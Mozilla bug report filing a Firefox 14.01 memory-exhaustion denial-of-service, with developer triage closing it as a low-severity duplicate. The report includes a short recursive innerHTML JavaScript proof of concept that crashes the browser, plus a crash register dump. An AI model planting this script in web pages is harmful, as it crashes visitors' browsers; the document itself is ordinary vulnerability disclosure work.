Status
()
People
(Reporter: shashankcyberboy, Unassigned)
Tracking
(4 keywords)
Firefox Tracking Flags
(Not tracked)
Details
Attachments
(2 attachments)
<!--
---------------------------------------------------
Mozilla Firefox 14.01 Memory Exhaustion DoS Exploit
---------------------------------------------------
Description:
Mozilla Firefox is prone to a memory exhaustion vulnerability.
The issue has been tested on Firefox 14.01, prior versions may also be affected.
mozalloc.cpp, line 184:
moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
int err = posix_memalign(ptr, alignment, size);
if (UNLIKELY(err && ENOMEM == err)) {
mozalloc_handle_oom();
return moz_xposix_memalign(ptr, alignment, size);
}
// else: (0 == err) or (EINVAL == err)
return err;
}
A crafted JavaScript leads the application to crash.
Stacktrace (Windows 7 SP1):
EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(C000)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
-->
<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
document.body.innerHTML += x;
e(x + 'x');
};
e('x')
</script>
</html>
|
||
Comment 1•6 years ago
|
||
DoS bugs from an intentional abort on OOM do not need to remain hidden.
Group: core-security
Keywords: sec-low
(In reply to Benjamin Smedberg [:bsmedberg] from comment #1) > DoS bugs from an intentional abort on OOM do not need to remain hidden. ok
|
||
Updated•6 years ago
|
||
Component: General → General
Keywords: crash, reproducible, testcase
Product: Firefox → Core
Version: unspecified → Trunk
|
|
||
Comment 3•6 years ago
|
||
Created attachment 654173 [details]
Reporter's Testcase|
|
||
Comment 4•6 years ago
|
||
Created attachment 654174 [details]
WinDbg Stack
Log against Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0 ID:20120821135628 (x64 Build) with javascript.options.mem.log;true.|
|
||
Updated•6 years ago
|
||
Status: UNCONFIRMED → NEW
Component: General → HTML: Parser
Ever confirmed: true
|
|
||
Comment 5•6 years ago
|
||
This is a duplicate. Please find the original and mark this a duplicate?
Whiteboard: DUPEME
|
|
||
Comment 6•6 years ago
|
||
I'm not sure, but maybe Bug 659333 whose Testcase uses innerHTML too?
(In reply to Boris Zbarsky (:bz) [In and out Aug 1 - 10, out Aug 11-20] from comment #5) > This is a duplicate. Please find the original and mark this a duplicate? sorry but itz not duplicate :/
|
||
Updated•6 years ago
|
||
Status: NEW → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 618234
You need to log in
before you can comment on or make changes to this bug.
Description
•